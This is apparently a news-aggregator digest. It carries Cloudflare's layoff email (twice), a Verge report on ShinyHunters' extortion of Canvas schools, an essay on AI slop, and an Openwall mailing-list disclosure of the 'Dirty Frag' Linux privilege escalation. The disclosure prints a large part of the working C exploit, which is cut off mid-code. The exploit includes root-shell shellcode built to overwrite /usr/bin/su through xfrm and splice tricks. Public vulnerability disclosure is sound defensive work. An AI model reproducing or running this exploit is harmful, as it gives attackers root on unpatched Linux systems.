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Building For The Future

blog.cloudflare.com

871 shares · 54 trendiness

2026 – 05-07

3 min read

This afternoon, we sent the following email to our global team. One of our core values at Cloudﬂare is transparency, and we believe it’s important that you hear this directly from us because it’s a major moment at Cloudﬂare.

Team:We are writing to let you know directly that we’ve made the decision to reduce Cloudﬂare’s workforce by more than 1,100 employees globally. The way we work at Cloudﬂare has fundamentally changed. We don’t just build and sell AI tools and platforms. We are our own most demanding customer. Cloudﬂare’s usage of AI has increased by more than 600% in the last three months alone. Employees across the company from engineering to HR to ﬁnance to marketing run thousands of AI agent sessions each day to get their work done. That means we have to be intentional in how we architect our company for the agentic AI era in order to supercharge the value we deliver to our customers and to honor our mission to help build a better Internet for everyone, everywhere. Today is a hard day. This decision unfortunately means saying goodbye to teammates who have contributed meaningfully to our mission and to building Cloudﬂare into one of the world’s most successful companies. We want to be clear that this decision is not a reﬂection of the individual work or talent of those leaving us. Instead, we are reimagining every internal process, team, and role across the company. Today’s actions are not a cost-cutting exercise or an assessment of individuals’ performance; they are about Cloudﬂare deﬁning how a world-class, high-growth company operates and creates value in the agentic AI era. This is a moment we need to own as founders and leaders of the company. Matthew has personally sent out every offer letter we’ve extended. It is a practice he has always looked forward to because it represented our growth and the incredible talent joining our mission. It didn’t feel right for this message to come from anyone other than the two of us. Rather than trickling out notices through managers, we will be sending emails to every employee. Within the next hour, every member of our global team will receive an email from both of us clarifying how this change affects them. For those departing today, we will send this update to both their personal and Cloudﬂare addresses to ensure they receive the information immediately.It’s important to us that we treat departing team members right and in a way that exceeds what we’ve seen from other companies. We believe acting with empathy isn’t about avoiding hard decisions but rather about how you treat people when those decisions are made. If we are asking our team to be world-class, we have a reciprocal obligation to be world-class in how we treat them. We are pairing the directness of these measures with severance packages that lead the industry. The packages for departing employees will include the equivalent of their full base pay through the end of 2026. Healthcare coverage is different across the globe, and if you’re in the United States, we’ll continue to provide support through the end of the year. We are also vesting equity for departing team members through August 15th, so they receive stock beyond their departure date. And, if departing team members haven’t hit their one-year cliffs, we are going to waive those and vest their pro-rated equity through August as well. We’ve asked the team to do this only once, as hard as that may be today. We don’t want to do it again for the foreseeable future. By taking decisive action now, we provide immediate clarity to those departing and protect the stability of the team that remains. We are making these changes now because making smaller, repeated cuts or dragging a reorganization out over multiple quarters creates prolonged emotional uncertainty for employees and stalls our ability to build. It’s the right thing to do; it’s the honest thing to do; and it reﬂects the values of the company we are continuing to build.Cloudﬂare started as a digitally native company built in the cloud. That allowed us to catch up to and pass companies that had a head start of years or decades but were slowed down by outdated systems and processes. As we’ve now become the leader, we cannot rest on the workﬂows and organizational structures that worked yesterday. We’re conﬁdent that our reshaped organization will be even faster and more innovative as we continue building the future.To those departing us: you’ve helped build the strong foundation Cloudﬂare stands on today. We have the utmost respect for your work and gratitude for the impact you have made. We’re conﬁdent you will land at other great places and build many future great companies, bringing with you a unique set of skills learned while building Cloudﬂare.Transparency is a core principle at Cloudﬂare, and it was important that you hear this from us ﬁrst. We will be heading to our earnings conference call at 2 PM PT, when we’ll share more. We also plan to address today’s announcements live with the team at our all-hands meeting. It’s not an easy day, but it’s the right decision. Our mission to help build a better Internet is more important now than ever, and there’s a lot of work left to be done.

Team:

We are writing to let you know directly that we’ve made the decision to reduce Cloudﬂare’s workforce by more than 1,100 employees globally.

The way we work at Cloudﬂare has fundamentally changed. We don’t just build and sell AI tools and platforms. We are our own most demanding customer. Cloudﬂare’s usage of AI has increased by more than 600% in the last three months alone. Employees across the company from engineering to HR to ﬁnance to marketing run thousands of AI agent sessions each day to get their work done. That means we have to be intentional in how we architect our company for the agentic AI era in order to supercharge the value we deliver to our customers and to honor our mission to help build a better Internet for everyone, everywhere.

Today is a hard day. This decision unfortunately means saying goodbye to teammates who have contributed meaningfully to our mission and to building Cloudﬂare into one of the world’s most successful companies. We want to be clear that this decision is not a reﬂection of the individual work or talent of those leaving us. Instead, we are reimagining every internal process, team, and role across the company. Today’s actions are not a cost-cutting exercise or an assessment of individuals’ performance; they are about Cloudﬂare deﬁning how a world-class, high-growth company operates and creates value in the agentic AI era.

This is a moment we need to own as founders and leaders of the company. Matthew has personally sent out every offer letter we’ve extended. It is a practice he has always looked forward to because it represented our growth and the incredible talent joining our mission. It didn’t feel right for this message to come from anyone other than the two of us. Rather than trickling out notices through managers, we will be sending emails to every employee.

Within the next hour, every member of our global team will receive an email from both of us clarifying how this change affects them. For those departing today, we will send this update to both their personal and Cloudﬂare addresses to ensure they receive the information immediately.

It’s important to us that we treat departing team members right and in a way that exceeds what we’ve seen from other companies. We believe acting with empathy isn’t about avoiding hard decisions but rather about how you treat people when those decisions are made. If we are asking our team to be world-class, we have a reciprocal obligation to be world-class in how we treat them. We are pairing the directness of these measures with severance packages that lead the industry. The packages for departing employees will include the equivalent of their full base pay through the end of 2026. Healthcare coverage is different across the globe, and if you’re in the United States, we’ll continue to provide support through the end of the year. We are also vesting equity for departing team members through August 15th, so they receive stock beyond their departure date. And, if departing team members haven’t hit their one-year cliffs, we are going to waive those and vest their pro-rated equity through August as well.

We’ve asked the team to do this only once, as hard as that may be today. We don’t want to do it again for the foreseeable future. By taking decisive action now, we provide immediate clarity to those departing and protect the stability of the team that remains. We are making these changes now because making smaller, repeated cuts or dragging a reorganization out over multiple quarters creates prolonged emotional uncertainty for employees and stalls our ability to build. It’s the right thing to do; it’s the honest thing to do; and it reﬂects the values of the company we are continuing to build.

Cloudﬂare started as a digitally native company built in the cloud. That allowed us to catch up to and pass companies that had a head start of years or decades but were slowed down by outdated systems and processes. As we’ve now become the leader, we cannot rest on the workﬂows and organizational structures that worked yesterday. We’re conﬁdent that our reshaped organization will be even faster and more innovative as we continue building the future.

To those departing us: you’ve helped build the strong foundation Cloudﬂare stands on today. We have the utmost respect for your work and gratitude for the impact you have made. We’re conﬁdent you will land at other great places and build many future great companies, bringing with you a unique set of skills learned while building Cloudﬂare.

Transparency is a core principle at Cloudﬂare, and it was important that you hear this from us ﬁrst. We will be heading to our earnings conference call at 2 PM PT, when we’ll share more. We also plan to address today’s announcements live with the team at our all-hands meeting.

It’s not an easy day, but it’s the right decision. Our mission to help build a better Internet is more important now than ever, and there’s a lot of work left to be done.

Read more Read the original on blog.cloudflare.com →

Read the original on blog.cloudflare.com →

reuters.com

www.reuters.com

869 shares · 64 trendiness

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Read more Read the original on www.reuters.com →

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Canvas is online again after ShinyHunters threaten to leak schools’ data

www.theverge.com

729 shares · 53 trendiness

The Instructure-owned learning management platform, Canvas, is now online again after it went down following a massive data breach that impacted student names, email addresses, ID numbers, and messages. Before systems were restored, students who attempted to access the system on Thursday saw a message from the hacking group ShinyHunters, which claimed responsibility for the attack:

ShinyHunters has breached Instructure (again). Instead of contacting us to resolve it they ignored us and did some “security patches.” If any of the schools in the affected list are interested in preventing the release of their data, please consult with a cyber advisory ﬁrm and contact us privately at TOX to negotiate a settlement. You have till the end of the day by 12 May 2026 before everything is leaked.

The message included a link to a list of schools ShinyHunter claims to have breached through Canvas.

“Yesterday, Instructure discovered the unauthorized actor involved in our ongoing security incident made changes to the pages that appeared when some students and teachers were logged in. Out of an abundance of caution, we immediately took Canvas ofﬂine to contain access and further investigate,” Instructure said in a statement to The Verge. “We regret the inconvenience and concern this may have caused.”

According to Instructure’s status page, Canvas is now available for most users, though Canvas Beta and Canvas Test systems are still in maintainence mode. Instructure is also investigating an issue where some users are having difﬁculties logging into Student ePortfolios.

“We have conﬁrmed that the unauthorized actor exploited an issue related to our Free-For-Teacher accounts. As a result, we have made the difﬁcult decision to temporarily shut down our Free-For-Teacher accounts,” Instructure said in its statement. The company has not mentioned when those accounts are expected to be restored.

Instructure said last week that it “deployed patches to enhance system security” following the breach. ShinyHunters — which has claimed responsibility for attacks on Ticketmaster, AT&T, Rockstar Games, ADT, and Vercel — said its data leak site contains 9,000 schools, including data belonging to 275 million students, teachers, and other staff, according to Bleeping Computer.

Update, May 7th: Added Instructure’s maintenance mode message.

Update, May 8th: Added statement from Instructure regarding the service being back online.

Follow topics and authors from this story to see more like this in your personalized homepage feed and to receive email updates.

Emma Roth

Jess Weatherbed

Read more Read the original on www.theverge.com →

Read the original on www.theverge.com →

AI Slop is Killing Online Communities

rmoff.net

702 shares · 36 trendiness

Like a young child coming home from kindergarten with their latest crayon scrawls, the internet is currently awash with people sharing their AI-generated work. And just like the young child’s drawings, much of that work should be proudly put up on the walls within the artist’s house—and no further.

Prologue: I ❤️ AI 🔗

It’s just that I know when to keep my crayon-drawings to myself ;) And I am getting increasingly sad and frustrated seeing communities that I value slowly wilting under the onslaught of shit. Often that shit is perhaps naïvely shared with no deleterious intent, but shit nonetheless it is.

Congratulations, you entered a prompt and pressed return. 🔗

“I rewrote Kafka in COBOL”

Great, enter it at your next science fair. Meanwhile stop begging for stars on your brand new GitHub repo that no-one’s touching with a bargepole.

“I wrote a blog post about Kafka”

Did you though? We can tell that Claude wrote it, and it’s a piece of garbage.

“I made this video about Kafka”

Cool story bro. Except AI made it, and it’s only of interest as a curiosity, not a useful learning artefact.

“I’m self-publishing an ebook that I wrote about Kafka”

What you mean is, you got Claude to scrape the internet and crap out a “book” that you should be ashamed to give away for free.

Any fool can feed coins into a fruit machine and pull the arm.

Step 0: Proﬁt 🔗

The pattern I see over and over seems to be:

Step 1: Discover agentic coding. Mind blown.

Step 2: Chuck a project up onto GitHub (if it’s actually up </snark>).

Step 3: Have AI write a breathless blog post about your vibe-coded project. Share blog post and repo to any subreddit and Slack group that you can ﬁnd. Not sure which is suitable? Post to all of them—people will love to see it! /s

Let me tell you now: pause after step 2. Take a really long breath. Think really hard about what you’ve created, and why you want to share it. If it’s “because it’s cool” then I’ve got news for you: agentic coding is no longer a novelty. It’s just how shit gets done now.

If you can think of the prompt, AI can write it. Big deal. That’s so early-2026. Move on.

Still want to share it far and wide? Is it actually useful? Are you using it? Has it got really good documentation? Is it usable? Have you actually come back to the code again and again and put it through its paces? Or was it a one-night stand with Claude and the next morning neither of you thinks it was such a good idea?

Still want to share it? If it’s software, are you prepared to stand behind it as something people will raise issues against, maybe submit PRs for? If it’s written, is it something you’d want to read? Is it actually adding to the cumulative understanding of the community, or is it just an LLM auto-completing its way through text that you can’t be arsed to write and I can’t be arsed to read?

Who cares? 🔗

No one forces me to read this stuff. Why am I so bothered by it?

Because like bindweed, it’s slowly strangling the organic life out of communities. When I open up Reddit now, it’s increasingly overrun with vibe-coded AI stuff. Whilst much of it is well-intentioned I’m sure, it does nothing to contribute to the community.

AI slop is driving up the noise, and making the signal more and more difﬁcult to discern in communities. This risks becoming a downward spiral; as communities become more polluted by this stuff, members will get frustrated from wading through AI slop and draw back, thus diminishing the life of the organic community even further.

Carrying on like this, online communities will either wither and die, or converge on something like the dystopian-but-banal MoltBook in which AI agents “talk” to each other with no humans present.

There’s good ‘slop’ and bad slop 🔗

You may have noticed that AI Slop has become the mot du jour.

The broad use of the term that I’m generally familiar with is as a negative description for low-effort material created by AI and foisted upon those to whom it is of no beneﬁt. However I learnt recently that there are those—probably correlating strongly with the AI-hating crowd—who brand anything written about AI as “AI Slop”, even if not written by AI.

Material created with the assistance of AI is not bad in itself. It’s the purpose to which it’s put.

A good use of AI is when it enables people to do something they couldn’t do before, to contribute to a community when they couldn’t before. Done with the care and good intent of a human behind it, this is a nett positive.

Bad AI slop, on the other hand, is monkeys throwing crap over the fence for a purpose other than furthering the community. This includes spam, engagement farming, and simply thoughtless noise in a space which is not for that purpose.

OK, but who made you gatekeeper of the internet? 🔗

The standards of common decency and taste, that’s who.

Let’s take a step back. Sharing content online is wonderful. It’s pretty much what made the internet what it is today.

The knack is to understand what you’re sharing, to whom, and why.

If you were born before around 1980 you’ll know that there was the Geocities era. Every high-school nerd had a homepage (mine was in Vienna since you’re asking).

Just because I built a homepage on Geocities, complete with ‘Under Construction’ anigifs, a web counter and a web ring banner, does not mean that I should be sharing it to anyone who’ll listen. Amongst my friends, sure. My parents, of course—they’ll be proud of anything I build. But to the general internet? Who cares.

And now with AI-generated content, whether a vibe-coded app or a blog post, the same applies. The internet went through a collective convulsion in early 2026 as everyone discovered the power of Claude Opus 4.5 (and don’t get me wrong, it is damn cool). And what does anyone do when they discover anything neat? They want to share it with their friends!

Combine that with the deafening AI-hype machine of grifters already in overdrive—and suddenly subreddits and Slacks are overrun with AI-generated material.

Built with AI, not by AI 🔗

This excellent section heading is taken from my friend and colleague Gunnar Morling’s recent article. As I outlined above, AI is a powerful tool, and I will argue with anyone for the case that it’s pretty much a dereliction of one’s job to not be including it in one’s toolbox. Gunnar nails the nuance though:

Build with AI.

AI is just a tool.

You need to do the thinking, the instructing, the checking.

Gunnar has built a fantastic new project (Hardwood; a new parser for Apache Parquet), using AI. Does that mean it falls foul of my wrath and judgement? No, of course not. It’s a project that’s taken four months so far, with a solid roadmap, a burgeoning community, and a thoughtful and careful design behind it.

Contribution 🔗

Does your offering contribute anything to the community?

If you boil it down to its essentials, is what you’re sharing anything other than the manifestation of a prompt fed into an agentic coding tool? If I took your prompt and ran it, would I end up with something similar? Prompt engineering is fun and an interesting study, but it’s tangential to the subject itself. Consider a community of ornate furniture enthusiasts (I’m sure such a thing exists); it’s the equivalent of bombarding them with Ikea-esque pieces simply because you’ve got a really interesting set of chisels that you want to show off.

Just like I’m not posting my kid’s drawings off to the National Gallery just yet, I’m also not sharing every cool app that I can build with Claude. Not that “software is art” (though some of the best actually is), but there’s nothing much interesting in the puerile output of a process. Anyone with a few tokens can prompt their way to a bit of software. Throwaway tools are just ﬁne. They’re great, in fact—the internet is built on weird little scripts that people have built and shared. But chuck them on gist/GitHub—they don’t need a launch blog post as if you’re the incarnation of Steve Jobs.

This is a tale as old as time. Well, the internet anyway, once it got beyond ARPANET and BBSes.

Whether Usenet, Reddit, lobste.rs, or any other online platform, the netiquette is always to “lurk”. Hang around, read what gets written, get a feel for “the vibe”.

I’m not the arbiter of what’s acceptable in a given community. The community members are. Vibed an amazing new implementation of the Kafka protocol, but not sure if people want to see it? Read the room, and get a feel for whether they’ll welcome with open arms your AI slop—or not. If in doubt, ask!

As well as lurking, another way of showing respect to the community is to be very open and clear about if, how, and where you’re using AI in your contribution.

The Asymmetry of Bullshit 🔗

What’s the impact on others of your contribution?

The amount of energy needed to refute bullshit is an order of magnitude bigger than that needed to produce it.

If you splurge out a gobbledegook article, you’re putting that workload onto your reader to realise that it’s not worth wading through. If you dump a complex PR into a project without due care, you’re obligating the reviewers to go through the code and for them to explain to you why it can’t be merged. In both of these scenarios the community would be better off without your contribution.

Pre-AI, the effort required for contributions was sufﬁcient proof of work to either deter people or demonstrate an actual commitment. Communities could deal with sub-par contributions. Those well-intentioned and willing to learn could be mentored and often would develop into important members of the community. Those less well-intentioned and not doing much more than spamming could be dealt with because the volume was so low.

With great power… 🔗

or perhaps that should be “With a great number of tokens”

Communities are powerful yet fragile things. Don’t be the bindweed that suffocates the life out of them.

Explore with great joy the power that LLMs and agentic coding tools bring. Enjoy the frisson of jfc that is cool that it invariably brings.

But respect the community, and only share what is truly relevant. Save the crayon pictures for your kitchen fridge.

Bindweed photo by Joshua Ralph on Unsplash.

All other pictures by my kids. Which is ironic, given my exhorting for people to literally keep their childish drawings to themselves ;)

Read more Read the original on rmoff.net →

Read the original on rmoff.net →

security - Dirty Frag: Universal Linux LPE

www.openwall.com

678 shares · 36 trendiness

Products

Openwall GNU/*/Linux server OS Linux Kernel Runtime Guard John the Ripper password cracker

Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS

Wordlists for password cracking passwdqc policy enforcement

Free & Open Source for Unix Pro for Windows (Active Directory)

yescrypt KDF & password hashing yespower Proof-of-Work (PoW) crypt_blowﬁsh password hashing phpass ditto in PHP tcb better password shadowing Pluggable Authentication Modules scanlogd port scan detector popa3d tiny POP3 daemon blists web interface to mailing lists msulogin single user mode login php_mt_seed mt_rand() cracker

Openwall GNU/*/Linux server OS

Linux Kernel Runtime Guard

John the Ripper password cracker

Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS

Free & Open Source for any platform

in the cloud

Pro for Linux

Pro for macOS

Wordlists for password cracking

passwdqc policy enforcement

Free & Open Source for Unix Pro for Windows (Active Directory)

Free & Open Source for Unix

Pro for Windows (Active Directory)

yescrypt KDF & password hashing

yespower Proof-of-Work (PoW)

crypt_blowﬁsh password hashing

phpass ditto in PHP

tcb better password shadowing

Pluggable Authentication Modules

scanlogd port scan detector

popa3d tiny POP3 daemon

blists web interface to mailing lists

msulogin single user mode login

php_mt_seed mt_rand() cracker

Services

Publications

Articles Presentations

Articles

Presentations

Resources

Mailing lists Community wiki Source code repositories (GitHub) File archive & mirrors How to verify digital signatures OVE IDs

Mailing lists

Community wiki

Source code repositories (GitHub)

File archive & mirrors

How to verify digital signatures

OVE IDs

What’s new

Message-ID: <afzgS2SCWNcZU3vU@v4bel> Date: Fri, 8 May 2026 03:56:11 +0900 From: Hyunwoo Kim <imv4bel@…il.com> To: oss-security@…ts.openwall.com Cc: imv4bel@…il.com Subject: Dirty Frag: Universal Linux LPE

Hi,

This is a report on “Dirty Frag”, a universal LPE that allows obtaining root privileges on all major distributions.

This vulnerability has a similar impact to the previous Copy Fail.

Because the embargo has now been broken, no patches or CVEs exist for these vulnerabilities. After consultation with the linux-distros@…openwall.org maintainers, and at the maintainers’ request, I am publicly releasing this Dirty Frag document.

As with the previous Copy Fail vulnerability, Dirty Frag likewise allows immediate root privilege escalation on all major distributions, and it chains two separate vulnerabilities:

- https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4 - https://lore.kernel.org/all/afKV2zGR6rrelPC7@v4bel/

Because the responsible disclosure schedule and embargo have been broken, no patches exist for any distribution. Use the following command to remove the modules in which the vulnerabilities occur: ``` sh -c “printf ‘install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n’ > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true” ```

For detailed technical information about the vulnerabilities and the reason the embargo was broken, please check https://dirtyfrag.io.

Full exploit code: ```c #deﬁne _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> #include <sched.h> #include <sys/syscall.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/uio.h> #include <sys/ioctl.h> #include <sys/wait.h> #include <netinet/in.h> #include <arpa/inet.h> #include <net/if.h> #include <linux/if.h> #include <linux/netlink.h> #include <linux/rtnetlink.h> #include <linux/xfrm.h>

#ifndef UDP_ENCAP #deﬁne UDP_ENCAP 100 #endif #ifndef UDP_ENCAP_ESPINUDP #deﬁne UDP_ENCAP_ESPINUDP 2 #endif #ifndef SOL_UDP #deﬁne SOL_UDP 17 #endif

#deﬁne ENC_PORT 4500 #deﬁne SEQ_VAL 200 #deﬁne REPLAY_SEQ 100 #deﬁne TARGET_PATH “/usr/bin/su” #deﬁne PATCH_OFFSET 0 /* overwrite whole ELF starting at ﬁle[0] */ #deﬁne PAYLOAD_LEN 192 /* bytes of shell_elf to write (48 triggers) */ #deﬁne ENTRY_OFFSET 0x78 /* shellcode entry inside the new ELF */

/* * 192-byte minimal x86_64 root-shell ELF. * _start at 0x400078: * setgid(0); setuid(0); setgroups(0, NULL); * execve(“/bin/sh”, NULL, [“TERM=xterm”, NULL]); * PT_LOAD covers 0xb8 bytes (the actual content) at vaddr 0x400000 R+X. * * Setting TERM in the new shell’s env silences the * “tput: No value for $TERM” / “test: : integer expected” noise * /etc/bash.bashrc and friends emit when TERM is unset. * * Code (from offset 0x78): * 31 ff xor edi, edi * 31 f6 xor esi, esi * 31 c0 xor eax, eax * b0 6a mov al, 0x6a ; setgid * 0f 05 syscall * b0 69 mov al, 0x69 ; setuid * 0f 05 syscall * b0 74 mov al, 0x74 ; setgroups * 0f 05 syscall * 6a 00 push 0 ; envp[1] = NULL * 48 8d 05 12 00 00 00 lea rax, [rip+0x12] ; rax = “TERM=xterm” * 50 push rax ; envp[0] * 48 89 e2 mov rdx, rsp ; rdx = envp * 48 8d 3d 12 00 00 00 lea rdi, [rip+0x12] ; rdi = “/bin/sh” * 31 f6 xor esi, esi ; rsi = NULL (argv) * 6a 3b 58 push 0x3b ; pop rax ; rax = 59 (execve) * 0f 05 syscall ; execve(“/bin/sh”,NULL,envp) * “TERM=xterm\0″ (offset 0xa5..0xaf) * “/bin/sh\0” (offset 0xb0..0xb7) */ static const uint8_t shell_elf[PAYLOAD_LEN] = { 0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00, 0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00, 0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0x31,0xf6,0x31,0xc0,0xb0,0x6a, 0x0f,0x05,0xb0,0x69,0x0f,0x05,0xb0,0x74,0x0f,0x05,0x6a,0x00,0x48,0x8d,0x05,0x12, 0x00,0x00,0x00,0x50,0x48,0x89,0xe2,0x48,0x8d,0x3d,0x12,0x00,0x00,0x00,0x31,0xf6, 0x6a,0x3b,0x58,0x0f,0x05,0x54,0x45,0x52,0x4d,0x3d,0x78,0x74,0x65,0x72,0x6d,0x00, 0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, };

extern int g_su_verbose; int g_su_verbose = 0; #deﬁne SLOG(fmt, …) do { if (g_su_verbose) fprintf(stderr, “[su] ” fmt “\n”, ##__VA_ARGS__); } while (0)

static int write_proc(const char *path, const char *buf) { int fd = open(path, O_WRONLY); if (fd < 0) return -1; int n = write(fd, buf, strlen(buf)); close(fd); return n; }

static void setup_userns_netns(void) { uid_t real_uid = getuid(); gid_t real_gid = getgid(); if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) { SLOG(“unshare: %s”, strerror(errno)); exit(1); } write_proc(“/proc/self/setgroups”, “deny”); char map[64]; snprintf(map, sizeof(map), “0 %u 1″, real_uid); if (write_proc(“/proc/self/uid_map”, map) < 0) { SLOG(“uid_map: %s”, strerror(errno)); exit(1); } snprintf(map, sizeof(map), “0 %u 1”, real_gid); if (write_proc(“/proc/self/gid_map”, map) < 0) { SLOG(“gid_map: %s”, strerror(errno)); exit(1); } int s = socket(AF_INET, SOCK_DGRAM, 0); if (s < 0) { SLOG(“socket: %s”, strerror(errno)); exit(1); } struct ifreq ifr; memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, “lo”, IFNAMSIZ); if (ioctl(s, SIOCGIFFLAGS, &ifr) < 0) { SLOG(“SIOCGIFFLAGS: %s”, strerror(errno)); exit(1); } ifr.ifr_ﬂags |= IFF_UP | IFF_RUNNING; if (ioctl(s, SIOCSIFFLAGS, &ifr) < 0) { SLOG(“SIOCSIFFLAGS: %s”, strerror(errno)); exit(1); } close(s); }

static void put_attr(struct nlmsghdr *nlh, int type, const void *data, size_t len) { struct rtattr *rta = (struct rtattr *)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len)); rta->rta_type = type; rta->rta_len = RTA_LENGTH(len); memcpy(RTA_DATA(rta), data, len); nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + RTA_ALIGN(rta->rta_len); }

static int add_xfrm_sa(uint32_t spi, uint32_t patch_seqhi) { int sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM); if (sk < 0) return -1; struct sockaddr_nl nl = { .nl_family = AF_NETLINK }; if (bind(sk, (struct sockaddr*)&nl, sizeof(nl)) < 0) { close(sk); return -1; }

char buf[4096] = {0}; struct nlmsghdr *nlh = (struct nlmsghdr *)buf; nlh->nlmsg_type = XFRM_MSG_NEWSA; nlh->nlmsg_ﬂags = NLM_F_REQUEST | NLM_F_ACK; nlh->nlmsg_pid = getpid(); nlh->nlmsg_seq = 1; nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info));

struct xfrm_usersa_info *xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh); xs->id.daddr.a4 = inet_addr(“127.0.0.1”); xs->id.spi = htonl(spi); xs->id.proto = IPPROTO_ESP; xs->saddr.a4 = inet_addr(“127.0.0.1″); xs->family = AF_INET; xs->mode = XFRM_MODE_TRANSPORT; xs->replay_window = 0; xs->reqid = 0x1234; xs->ﬂags = XFRM_STATE_ESN; xs->lft.soft_byte_limit = (uint64_t)-1; xs->lft.hard_byte_limit = (uint64_t)-1; xs->lft.soft_packet_limit = (uint64_t)-1; xs->lft.hard_packet_limit = (uint64_t)-1; xs->sel.family = AF_INET; xs->sel.preﬁxlen_d = 32; xs->sel.preﬁxlen_s = 32; xs->sel.daddr.a4 = inet_addr(“127.0.0.1”); xs->sel.saddr.a4 = inet_addr(“127.0.0.1″);

{ char alg_buf[sizeof(struct xfrm_algo_auth) + 32]; memset(alg_buf, 0, sizeof(alg_buf)); struct xfrm_algo_auth *aa = (struct xfrm_algo_auth *)alg_buf; strncpy(aa->alg_name, “hmac(sha256)”, sizeof(aa->alg_name)-1); aa->alg_key_len = 32 * 8; aa->alg_trunc_len = 128; memset(aa->alg_key, 0xAA, 32); put_attr(nlh, XFRMA_ALG_AUTH_TRUNC, alg_buf, sizeof(alg_buf)); } { char alg_buf[sizeof(struct xfrm_algo) + 16]; memset(alg_buf, 0, sizeof(alg_buf)); struct xfrm_algo *ea = (struct xfrm_algo *)alg_buf; strncpy(ea->alg_name, “cbc(aes)”, sizeof(ea->alg_name)-1); ea->alg_key_len = 16 * 8; memset(ea->alg_key, 0xBB, 16); put_attr(nlh, XFRMA_ALG_CRYPT, alg_buf, sizeof(alg_buf)); } { struct xfrm_encap_tmpl enc; memset(&enc, 0, sizeof(enc)); enc.encap_type = UDP_ENCAP_ESPINUDP; enc.encap_sport = htons(ENC_PORT); enc.encap_dport = htons(ENC_PORT); enc.encap_oa.a4 = 0; put_attr(nlh, XFRMA_ENCAP, &enc, sizeof(enc)); } { char esn_buf[sizeof(struct xfrm_replay_state_esn) + 4]; memset(esn_buf, 0, sizeof(esn_buf)); struct xfrm_replay_state_esn *esn = (struct xfrm_replay_state_esn *)esn_buf; esn->bmp_len = 1; esn->oseq = 0; esn->seq = REPLAY_SEQ; esn->oseq_hi = 0; esn->seq_hi = patch_seqhi; esn->replay_window = 32; put_attr(nlh, XFRMA_REPLAY_ESN_VAL, esn_buf, sizeof(esn_buf)); }

if (send(sk, nlh, nlh->nlmsg_len, 0) < 0) { close(sk); return -1; } char rbuf[4096]; int n = recv(sk, rbuf, sizeof(rbuf), 0); if (n < 0) { close(sk); return -1; } struct nlmsghdr *rh = (struct nlmsghdr *)rbuf; if (rh->nlmsg_type == NLMSG_ERROR) { struct nlmsgerr *e = NLMSG_DATA(rh); if (e->error) { close(sk); return -1; } } close(sk); return 0; }

static int do_one_write(const char *path, off_t offset, uint32_t spi) { int sk_recv = socket(AF_INET, SOCK_DGRAM, 0); if (sk_recv < 0) return -1; int one = 1; setsockopt(sk_recv, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one)); struct sockaddr_in sa_d = { .sin_family = AF_INET, .sin_port = htons(ENC_PORT), .sin_addr = { inet_addr(“127.0.0.1”) }, }; if (bind(sk_recv, (struct sockaddr*)&sa_d, sizeof(sa_d)) < 0) { close(sk_recv); return -1; } int encap = UDP_ENCAP_ESPINUDP; if (setsockopt(sk_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) { close(sk_recv); return -1; } int sk_send = socket(AF_INET, SOCK_DGRAM, 0); if (sk_send < 0) { close(sk_recv); return -1; } if (connect(sk_send, (struct sockaddr*)&sa_d, sizeof(sa_d)) < 0) { close(sk_send); close(sk_recv); return -1; } int ﬁle_fd = open(path, O_RDONLY); if (ﬁle_fd < 0) { close(sk_send); close(sk_recv); return -1; }

int pfd[2]; if (pipe(pfd) < 0) { close(ﬁle_fd); close(sk_send); close(sk_recv); return -1; }

uint8_t hdr[24]; *(uint32_t*)(hdr + 0) = htonl(spi); *(uint32_t*)(hdr + 4) = htonl(SEQ_VAL); memset(hdr + 8, 0xCC, 16);

struct iovec iov_h = { .iov_base = hdr, .iov_len = sizeof(hdr) }; if (vmsplice(pfd[1], &iov_h, 1, 0) != (ssize_t)sizeof(hdr)) { close(ﬁle_fd); close(pfd[0]); close(pfd[1]); close(sk_send); close(sk_recv); return -1; } off_t off = offset; ssize_t s = splice(ﬁle_fd, &off, pfd[1], NULL, 16, SPLICE_F_MOVE); if (s != 16) { close(ﬁle_fd); close(pfd[0]); close(pfd[1]); close(sk_send); close(sk_recv); return -1; } s = splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE); /* still proceed regardless of splice rc — kernel may have already * decrypted the page in the time between splice and recv */ usleep(150 * 1000);

close(ﬁle_fd); close(pfd[0]); close(pfd[1]); close(sk_send); close(sk_recv); return s == 40 ? 0 : -1; }

